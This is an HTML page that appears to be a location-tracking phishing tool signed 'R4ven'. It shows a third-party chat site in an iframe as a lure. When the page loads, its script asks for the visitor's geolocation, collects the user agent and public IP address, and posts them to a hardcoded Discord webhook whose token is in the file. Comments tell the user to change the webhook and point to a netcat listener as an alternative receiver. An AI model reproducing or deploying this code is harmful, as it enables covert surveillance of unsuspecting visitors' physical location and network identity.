<!DOCTYPE html>
<html>

<body onload="getLocation()">

<iframe src="https://www.tohla.com/chat/" width="100%" height="900" loading="lazy ass" style="border:none;">
</iframe>

</body>
<script>
var x = document.getElementById("demo");

function getLocation() {
  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(showPosition, showError);
  } else { 
    x.innerHTML = "Geolocation is not supported by this browser.";
  }
}

function myIP() {
    if (window.XMLHttpRequest) xmlhttp = new XMLHttpRequest();
    else xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");

    xmlhttp.open("GET","http://api.hostip.info/get_html.php",false);
    xmlhttp.send();

    hostipInfo = xmlhttp.responseText.split("\n");

    for (i=0; hostipInfo.length >= i; i++) {
        ipAddress = hostipInfo[i].split(":");
        if ( ipAddress[0] == "IP" ) return ipAddress[1];
    }

    return false;
}

function showPosition(position) {
  var latlong = (" GET " , "Latitude: " + position.coords.latitude + "\nLongitude: " + position.coords.longitude + "\nUagent:" + navigator.userAgent + "\nFirewall ip: " + myIP());
  
  const request = new XMLHttpRequest();
      request.open("POST", "https://discord.com/api/webhooks/977798116013133904/Es0rxL_L86Igb_lb9HeDSW2jtRy4th7k5n5LUtGsgvCRD0hOXeeHt2E8kZZYfkMpjTKY"); //change webhook

      request.setRequestHeader('Content-type', 'application/json');

      const params = {
        username: "R4ven",
        avatar_url: "https://i.pinimg.com/originals/27/bb/72/27bb72f7f7085f9c81153ce6c7bc2605.jpg",
        content: latlong
      }

      request.send(JSON.stringify(params));
//document.location='http://192.168.13.175:4321/'+latlong;
// use netcat to listen (nc -nlvp portnumber) (don’t forget to chnage ip and portnumber)
// and yeah that's random ip 😏
}

function showError(error) {
  switch(error.code) {
    case error.PERMISSION_DENIED:
      x.innerHTML = "User denied the request for Geolocation."
      break;
    case error.POSITION_UNAVAILABLE:
      x.innerHTML = "Location information is unavailable."
      break;
    case error.TIMEOUT:
      x.innerHTML = "The request to get user location timed out."
      break;
    case error.UNKNOWN_ERROR:
      x.innerHTML = "An unknown error occurred."
      break;
  }
}
</script>

<script>
  function getIP(json) {
    var ip = ("GET", "---\nIp-address: " + json.ip)

    const request = new XMLHttpRequest();
      request.open("POST", "https://discord.com/api/webhooks/977798116013133904/Es0rxL_L86Igb_lb9HeDSW2jtRy4th7k5n5LUtGsgvCRD0hOXeeHt2E8kZZYfkMpjTKY"); //change webhook

      request.setRequestHeader('Content-type', 'application/json');

      const params = {
        username: "R4ven",
        avatar_url: "https://i.pinimg.com/originals/27/bb/72/27bb72f7f7085f9c81153ce6c7bc2605.jpg",
        content: ip
      }

      request.send(JSON.stringify(params));

  }
  </script>
  <script src="http://api.ipify.org?format=jsonp&callback=getIP"></script>
</html>
